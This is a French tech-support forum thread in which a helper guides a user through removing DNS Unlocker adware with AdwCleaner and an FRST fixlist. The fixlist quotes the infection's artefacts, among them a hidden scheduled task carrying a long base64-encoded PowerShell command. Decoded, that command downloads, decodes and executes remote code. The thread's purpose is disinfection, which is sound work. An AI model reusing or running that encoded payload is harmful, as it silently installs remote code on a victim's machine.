Votre question
Résolu

Adware (DNS unlocker), navigateur qui ram et plante...

Tags :
  • Virus
  • Adware
  • Sécurité
Dernière réponse : dans Sécurité et virus
17 Février 2016 20:34:24

Bonjour,

Maintenant que le problème de mon pc fixe est résolu je m'attaque à mon pc portable qui est bien plus pénible :( 
Alors voila des que je vais sur le navigateur de recherche (peu importe lequel), c'est la fin du monde! le processeur tourne a fond et la ram aussi. Quand je vais sur n’importe quelle site ou juste sur une recherche google il y a le fameux DNS unlocker qui s'affiche avec ses petites barres de partout et qui fait miraculeusement planter mon pc!
Pour comprendre a qu'elle point c'est affreux je n'ai même pas réussir a venir poster ici avec, je dois utiliser mon pc fixe et une clé USB afin de passer les logiciels et rapports...
Bref j'ai passé un coup de ccleaner dessus mais cela n'a pas résolu mon problème...
Je viens donc à vous avec un rapport de Farbar Recovery Scan Tool (frst) :
addition: http://up.security-x.fr/file.php?h=R8ae71f734b8931fa2ae...
rapport: http://up.security-x.fr/file.php?h=R37e3bbd1aca13fdbe96...

Autres pages sur : adware dns unlocker navigateur ram plante

a c 295 8 Sécurité
17 Février 2016 21:05:01

Bonjour,

Avant de te faire un script de correction pour FRST, passe un coup d'AdwCleaner :

  • Télécharge et lance AdwCleaner (d'Xplode), choisis l'option "Scanner".

  • Une fois le scan terminé, choisis l'option "Nettoyer".

  • Redémarre le PC comme demandé, héberge le rapport sur pjjoint.malekal.com puis copie-colle le lien donné par le site dans ta réponse. Le rapport est enregistré dans C:\AdwCleaner sous le nom d'AdwCleaner[C?].
    m
    0
    l
    17 Février 2016 21:50:05

    merci de la réponse rapide!

    Alors j'ai un problème, quand je lance l'analyse ça reste bloqué vers la fin sur 'Analyse des navigateurs...' et ca fait un moment maintenant et toujours pas bougé...
    Je viens de voir un nouveau sujet qui m'a fait penser que j'ai oublier de préciser quand je clic quelque part avec firefox plein de pages de pub s'ouvre.
    J'ai désinstallés tout à l'heure chrome et mozilla et je viens de réinstaller mozilla en prenant celui que j'ai sur mon pc fixe donc j’espère que ça vient pas de ça le fait que ça reste bloqué...
    m
    0
    l
    17 Février 2016 22:23:06

    Toujours la même chose en mode échec ca bloque à 'Analyse des navigateurs...'
    m
    0
    l
    a c 295 8 Sécurité
    17 Février 2016 22:42:12

    • Ouvre le Bloc-notes.
    • Copie-colle le texte encadré ci-dessous dans le Bloc-notes :

      start
      CloseProcesses:
      C:\Program Files (x86)\DNS Unlocker
      HKU\S-1-5-21-2253685306-3067779170-2445471748-1002\...\Run: [Super Optimizer] => C:\Program Files (x86)\Super Optimizer\SupOptLauncher.exe [676400 2015-07-31] ()
      CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
      CHR HKU\.DEFAULT\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
      Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134
      Tcpip\..\Interfaces\{62EBEBDD-8246-47B2-911C-795DB0AF8572}: [NameServer] 199.203.131.145,82.163.143.167
      Tcpip\..\Interfaces\{B7396C44-C373-4B8A-8A8A-DC5F6C1AEC94}: [NameServer] 82.163.142.7 95.211.158.134
      Tcpip\..\Interfaces\{B7396C44-C373-4B8A-8A8A-DC5F6C1AEC94}: [DhcpNameServer] 82.163.142.7
      Tcpip\..\Interfaces\{C79999D7-D7A0-4812-83D8-A0588B36242D}: [NameServer] 82.163.142.7 95.211.158.134
      Tcpip\..\Interfaces\{C79999D7-D7A0-4812-83D8-A0588B36242D}: [DhcpNameServer] 82.163.142.7
      Tcpip\..\Interfaces\{E8D668E2-B05D-4027-B78F-E0DC3FA296AD}: [NameServer] 82.163.142.7 95.211.158.134
      Tcpip\..\Interfaces\{E8D668E2-B05D-4027-B78F-E0DC3FA296AD}: [DhcpNameServer] 82.163.142.7
      SearchScopes: HKU\S-1-5-21-2253685306-3067779170-2445471748-1002 -> {BB82DE59-BC4C-4172-9AC4-73315F71CFFE} URL = hxxp://websearch.goodforsearch.info/?l=1&q={searchTerms}&pid=24378&r=2015/04/15&hid=16892592214347574971&lg=EN&cc=FR&unqvl=86
      FF DefaultSearchEngine,S: WebSearch
      FF DefaultSearchUrl: hxxp://websearch.goodforsearch.info/?pid=24378&r=2015/04/15&hid=16892592214347574971&lg=EN&cc=FR&unqvl=86&l=1&q=
      FF SearchEngineOrder.1: WebSearch
      FF SearchEngineOrder.1,S: WebSearch
      FF SelectedSearchEngine: WebSearch
      FF SelectedSearchEngine,S: WebSearch
      FF Homepage: hxxp://searchy.easylifeapp.com/
      FF Keyword.URL: hxxp://websearch.goodforsearch.info/?pid=24378&r=2015/04/15&hid=16892592214347574971&lg=EN&cc=FR&unqvl=86&l=1&q=
      FF SearchPlugin: C:\Users\charles\AppData\Roaming\Mozilla\Firefox\Profiles\ofjqeg3h.default\searchplugins\recherche-de-vidos-youtube.xml [2015-11-28]
      FF Extension: Red AdBlocker - C:\Users\charles\AppData\Roaming\Mozilla\Firefox\Profiles\ofjqeg3h.default\extensions\rffoppyzoodhywhcmzl@wcltwyipcbxaafddrgw.org [2015-05-23] [non signé]
      FF Extension: DigiFreeApp - C:\Users\charles\AppData\Roaming\Mozilla\Firefox\Profiles\ofjqeg3h.default\extensions\ljli_kqetnldj@fdgrrwcaubrgfdhcwlf.edu [2015-07-29] [non signé]
      FF Extension: TakeTiheCoupoN - C:\Users\charles\AppData\Roaming\Mozilla\Firefox\Profiles\ofjqeg3h.default\Extensions\7jZRoKnbb@b.net [2015-05-18] [non signé]
      FF Extension: DiggiCoupon - C:\Users\charles\AppData\Roaming\Mozilla\Firefox\Profiles\ofjqeg3h.default\Extensions\eKqRo@ybY.org [2015-06-05] [non signé]
      FF Extension: FinediBBEstDeal - C:\Users\charles\AppData\Roaming\Mozilla\Firefox\Profiles\ofjqeg3h.default\Extensions\n2S8IiQT@8.net [2015-06-26] [non signé]
      FF Extension: CaheaapMe - C:\Users\charles\AppData\Roaming\Mozilla\Firefox\Profiles\ofjqeg3h.default\Extensions\X@Ld8n.edu [2015-07-29] [non signé]
      FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK => non trouvé(e)
      CHR StartupUrls: Default -> "hxxp://searchy.easylifeapp.com/"
      R2 a2c204bb; c:\Program Files (x86)\appcalc\appcalc.dll [1635328 2015-04-15] () [Fichier non signé]
      c:\Program Files (x86)\appcalc
      C:\ProgramData\14eb1a8e-5ee1-0
      C:\ProgramData\14eb1a8e-1261-1
      C:\ProgramData\20636ef6-06e1-0
      C:\WINDOWS\System32\Tasks\{80E72F9F-B088-91A0-F76E-63204CC3582D}
      C:\ProgramData\20636ef6-0db5-0
      C:\ProgramData\1c4f26b0
      C:\ProgramData\{328d5fd7-712c-1}
      C:\ProgramData\{02c45224-612c-0}
      C:\WINDOWS\Tasks\Superclean.job
      C:\ProgramData\8190011622740931029
      C:\ProgramData\14eb1a8e-43c7-1
      C:\ProgramData\14eb1a8e-2b15-0
      Task: {534FD4FB-DE28-49C8-80C5-8D23B6D8CED6} - System32\Tasks\{E7211334-A049-F962-03FA-0AF51C65D295} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAYQBmAGUAcwB1AG4AcwAuAGkAbgBmAG8ALwB1AC8APwBxAD0AYwBnAF8AQwBSAEkAdQBKAHYAMwBBAGYAZgBVAGMATABHAEcAbQBEADgANgBkAGQANAB2AE0AeABRAEYAWABsAHQAdQBOAFcAdwBNADQAagBoAEgANAAxAF8ASwBaAFUAaQBfAE8AVQBRAEMAcgBQAGYANQAwAHQAMgBhAEcAcABoAEoATAByAGkAOABmAFQAUQBmAGwATgBrADYASwBhAG0AMgA1AHEAaQB5ADAASABVADEAdwA2AEUAeQA5AHAATwBtAEwAMAAtADEATABtAFAAagBNAE4AVgA0AFYAZABYAGoAVABHAEcARQBOAFoAegBxADcAWAAwADgALQB4ADUAcQBTAEUAcwA0AGsAMABKAEkAdQBYAFcAOQBaAGYAZABIAHQAawBoAGQATwA0AGUAOQBsAEEAMgBfAEMAWgA5AGIAVwBnAHUAagB2AFcAUQBDAEMAOABxAF8ATgBwAG8AcgB1AFIAMgBOAGcAQwBNADcAUwBCAFYAMABFAHAARQBRADgAQgBnAGcATAA1AHIAWABkAEMAYgBJADcAZwBvAGMATAB6AFoAbwBXAEIANgBjAGsAcQBiAEUAbwBxADIAagBnAEgAXwA0AHIAWgBZAFIARQAyAFgASABkAEIAcgAzAG4AZgBSAFMAUwB4AGMAWQBFADgAMwB5AHoAMwAwADIAVwBjAHQAWgBsAEgASgBzAC0AYgBZADQAZABjADUAYQBYADkAagBVADgAVQBtADMAOABoADYAQwBPAFcAdQA3AGcAYQA1AGYANQBLAFAAcwBDAEYARQBpADAAMQAyAFUANQB5AFgAWgBuAGUAcABoAHMAYgB1AFQAdgB1AEwAdgByAGkAbQBlAGsAbQB3AGYAMgBGAE0AaABSAEcATgBZADkAZwBiAE0ALQBmAEkAZABNADMAVgBfAGsAOAA0AGMAVwBqAFEANwBJAGgANwBZAGEANAA4AHEAMgBfAGEAUAAwADgAUABhAFgAWgBwAEMANgBIAF8AYgA1ADMAQgBvAFEAMAA4AEkAYQBFAF8AVgA2AG0AVwBMADAARgA1AEoAOABZAHgAUABoAHQAbQB5ADMATAA1ADYAUgBlAHAAVQBHAFMAeQBlAHAANQA3AEgAaQBWAGsAZABOAFgAWgByAHYAVgBmAHMAMwBsAE8AbAByAHcAagBrAEcATwBlAGUAMABKAEkARwBwAF8ANwA0AEMAJgBjAD0ARwAxAEUARQBUAFcAZgBXAEsASAAtAEIAMQBwAGgASgBRADAAVgBwAE4AeQBPADkAQQBTADMAbwBIAEoAVQBvAFYANgA1AHYAawA0AHUAQwBvAHMAbQBxAGgAaQBHAGwAQgBEADcAUgBIAFEAVwA5ADYAdgBRAGEASgBsAG0AMQBBAEwAZwBWAHcAVwBZAGgAagByAEsAMgBMAGMASwBkAEkAVQBMADMAbQBVADEAWQAwAEwARABpADUAVAB2ADUAbgB6AE0AOQBqAFYANwBhAGkAcgBMAFUAVwAwAFAAeAA3AGgAYwB1AGUAawBXAGEAOQBBAEEAdwBzAEcASwBFAGUAOQBYAEUAXwBNAHQAWgA5AEIAbQAzAFYAaAAyADQASABOADEATwBzADEAcwB3ADUAYQBkADcAdgA3ADMAVQBKAHQAMQAtAGMASgBXAGgARgB0AHkAZwB0AFkAeQBOAGkAOQBhADUASgBEADMATgBIAEcAMQB4AGcAdwA5AGUAMABTADMAegBzAGsARgBSAG4AbABLAFUAMQBYAHAAQgBsAGcAVAB1ADYATwBSAGUAawBXAHcAXwBjAHQATABpAE4ARwA0ADEATABkAF8AbQB2AEUAUQB0ADkAVABCADgARwB3ADgAcABCAGwANgBSAGMARQBUADUAQwBtAEMAWgBlAGwAcABEAHUAXwBnAHIAVQBiADYAcwB2AGMAdwBuAG4AcQAtAGYARQA0AHQAVwBCAGQARwAwAEMARABIADYAZAB4ADIAZgBCAE4ARAB5ADYAQgAyAG0AdQBmAHQAMgA0AFoATQBMAEEAZwBkAFYAdABfAGgARAAzAHUALQBTAEwATQB5ADMAaABOADMASgBxADQAVABGAEUAMgBxAEkAMwB6AFEAbgAyADEAZQB1AFkAWABLAFoASgBuAFcAMQB4AHoAbgAzAHkAegBGAFIATQBEAFcAYgBBAHQAeQBFAEsARABNAFcATABWAG0ALQA1ADkAcgBNAHAATQBEAFoAVgBiAF8ASwAwAHgAaQBYAG0AVQBJADIAdgBZAEEATQByAFoAbABlAGUAMwAyAGwATAB1AGoAcAAtAEQAZAA5AEYARwB3ADIAagBPAEgAbgAwAE0AdABqAGsARgBfAHAATwBkADQAUABEAG8ASQA2ADEAaABOAGMAYwBwAEgAUABZAEIAawAwADgAcwBHAFkAXwB4AFoAZQBJAGIAUAA0AFgAbgBSAF8AeABxAGsALQBCAC0ASABTAGMAZgB2AFAARwBOADUASwBOAGsAVAA3AHIASABXAGkAcABpAEcANABFAGQAVABpAHIAVgB1AFUAdwBaAHgAOAB6AGwAYwA1AC0ALQBGAHkAMQA2ADEALQByAGUAMwBKAHQAZwBtAHIAVABMAG0AeQB3AHIAbQB0AG4ARgBHAHMAVABKADEAVABHAHUANQA0AF8AegBTAG0AbQBGAHUATAAxAEIANgBSAGkAWgByAFUAeQA0AFUAbwBrAHIAegBqAEYANgBKAG0AZQBoAFUAQQB6AHIARAA1AEEAeQB1AHAAawBuADAAYwBoAGEARABtAGkASwBMAEIAZAAzAEcASABTAE0AQgBaAFgAUQBnAE0ANABKADEAVQBJAHAAWgAwAHEAUQBXAEwAYQAtAHUAaABJAGQATQBGAFYAMABFADIAdQAxADQAcABrADgAawBUAGQAVQB2AFQATQBXAFcAYgAyAG0AYwBXAGQATQB2AFIAQwBuAGsALQBXADgAMgBPAGEANQBuAFEAWAAyAG8AJgByAD0ANwA1ADEAMgA0ADUAOQAwADUANwA3ADkAOAA2ADIAMAA0ADQANwAiADsAJABzAHQAcwBrAD0AIgB7AEUANwAyADEAMQAzADMANAAtAEEAMAA0ADkALQBGADkANgAyAC0AMAAzAEYAQQAtADAAQQBGADUAMQBDADYANQBEADIAOQA1AH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
      Task: {5E28C45B-6431-4494-AB71-C5BD36D4B159} - System32\Tasks\Super Optimizer Schedule => C:\Program Files (x86)\Super Optimizer\SupOptLauncher.exe [2015-07-31] () <==== ATTENTION
      C:\Program Files (x86)\Super Optimizer
      Task: {6F470D66-7AF9-47CC-9A46-C809EE55DFD4} - System32\Tasks\{80E72F9F-B088-91A0-F76E-63204CC3582D} => /s /n /i:"/rt" "C:\PROGRA~3\1c4f26b0\3aa2676a.dll"
      Task: {DD836432-8C1C-4418-9272-FDC9AE8C8303} - System32\Tasks\Superclean => c:\programdata\{3efcdcb4-a1fd-f772-3efc-cdcb4a1f72d2}\hqghumeaylnlf.exe [2014-09-06] (Super PC Tools Ltd) <==== ATTENTION
      c:\programdata\{3efcdcb4-a1fd-f772-3efc-cdcb4a1f72d2}
      Task: {E599F1A4-DB85-406A-8E2C-31360C52754B} - System32\Tasks\DNSCOLFAX => dnscolfax.exe <==== ATTENTION
      Task: C:\WINDOWS\Tasks\Superclean.job => c:\programdata\{3efcdcb4-a1fd-f772-3efc-cdcb4a1f72d2}\hqghumeaylnlf.exe <==== ATTENTION
      Reg: reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Super Optimizer_is1" /f
      Reg: reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}_is1" /f
      Reg: reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{0F44DC3A-6E62-4961-A14B-95323C512F9B}_is1" /f
      Reg: reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E1527582-8509-4011-B922-29E3FB548882}_is1" /f
      Reg: reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{a2c204bb}" /f
      cmd: ipconfig /flushdns
      EmptyTemp:
      end

    • Enregistre le fichier au même endroit que le programme FRST sous le nom fixlist.txt
    • Lance FRST (Sous Windows Vista/7/8/10, clic droit sur FRST > Exécuter en tant qu'administrateur).
    • Clique sur Corriger. Patiente le temps de la correction.

      Note : si l'outil a besoin d'un redémarrage, laisse le système redémarrer normalement, l'outil terminera son travail.

    • Une fois la correction terminée, un rapport Fixlog.txt remplacera le fichier fixlist.
    • Héberge le rapport sur pjjoint.malekal.com et copie-colle le lien fourni dans ta prochaine réponse.
    m
    0
    l
    a c 295 8 Sécurité
    18 Février 2016 00:18:27

    AdwCleaner bloque toujours ?
    m
    0
    l
    18 Février 2016 00:43:54

    oui toujours pareille...
    m
    0
    l
    a c 295 8 Sécurité
    18 Février 2016 02:01:26

    Citation :
    # Option : Scanner

    --> Passe à l'option "Nettoyer".

    Ensuite, je voudrais un nouveau rapport FRST (et Addition) s'il te plaît (pour vérifier).
    m
    0
    l
    a c 295 8 Sécurité
    18 Février 2016 03:50:42

    Plus de souci ?

    Réutilise l'option "Corriger" de FRST avec le fixlist suivant :

    start
    FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\firefox.cfg [2013-06-06] <==== ATTENTION
    end
    m
    0
    l
    18 Février 2016 04:51:55

    Merci beaucoup je n'ai plus aucune pub, je peux enfin naviguer tranquillement! :) 
    m
    0
    l

    Meilleure solution

    a c 295 8 Sécurité
    18 Février 2016 12:48:24

    Pour finir :


    1/

    * Lance CCleaner. Va dans Options puis Avancé et décoche la case Effacer uniquement les fichiers temporaires de Windows datant de plus de 24 heures puis dans Surveillance, décoche les deux cases.
    * Va dans Nettoyeur et lance le nettoyage.


    2/

    ---> Télécharge DelFix sur ton Bureau puis lance-le.
    * Coche Purger la restauration système et laisse Supprimer les outils de désinfection coché.
    * Clique sur Exécuter.
    * Poste le rapport.


    ==Prévention==

    Malwarebytes' Anti-Malware peut être pratique en cas d'infection :
    http://www.commentcamarche.net/faq/15773-malwarebytes-a...

    Adware Prevention permet de t'entraîner à ne pas accepter de PUPs / adwares lors d'installations de logiciels :
    http://security-x.fr/~guigui0001/

    http://www.malekal.com/2011/07/27/detection-puplpi-pote...

    Un dossier sur la prévention et sécurité sur Internet est disponible ici.


    ==Problème résolu ?==

    Si tu estimes que ton problème est résolu, clique sur un des boutons Sélectionner comme meilleure solution présents en bas de mes réponses.
    partage
    18 Février 2016 13:47:45

    J'ai fait ce que tu m'as dit avec ccleaner mais j'avais déjà fait delfix avant donc je peux pas le refaire mais le rapport indiqué que tout les programme de désinfection avaient bien étaient désinstallés.
    Voila un grand merci à toi pour ton aide mon problème est résolu mon pc n'a jamais aussi bien marché! j'en ai profité pour mettre tout mes pilotes à jours ;) 
    Merci encore!
    m
    0
    l
    a c 295 8 Sécurité
    18 Février 2016 17:16:59

    Bonne fin de journée ;) 
    m
    0
    l
    Tom's guide dans le monde
    • Allemagne
    • Italie
    • Irlande
    • Royaume Uni
    • Etats Unis
    Suivre Tom's Guide
    Inscrivez-vous à la Newsletter
    • ajouter à twitter
    • ajouter à facebook
    • ajouter un flux RSS